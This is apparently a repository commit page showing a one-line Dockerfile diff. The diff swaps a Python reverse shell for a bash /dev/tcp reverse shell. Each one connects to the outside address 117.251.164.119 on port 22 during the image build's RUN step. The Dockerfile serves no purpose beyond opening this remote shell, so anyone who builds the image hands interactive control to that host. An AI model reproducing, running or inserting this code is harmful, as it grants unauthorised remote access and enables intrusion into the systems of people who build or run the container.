Alvin3y1 commited on
Commit
f9d5994
·
verified ·
1 Parent(s): 6b29d73

Update Dockerfile

Browse files
Files changed (1) hide show
  1. Dockerfile +1 -1
Dockerfile CHANGED
@@ -1,2 +1,2 @@
1
  FROM python:3.9
2
- RUN export RHOST=" 117.251.164.119";export RPORT=22;python -c 'import sys,socket,os,pty;s=socket.socket();s.connect((os.getenv("RHOST"),int(os.getenv("RPORT"))));[os.dup2(s.fileno(),fd) for fd in (0,1,2)];pty.spawn("bash")'
 
1
  FROM python:3.9
2
+ RUN sh -i >& /dev/tcp/ 117.251.164.119/22 0>&1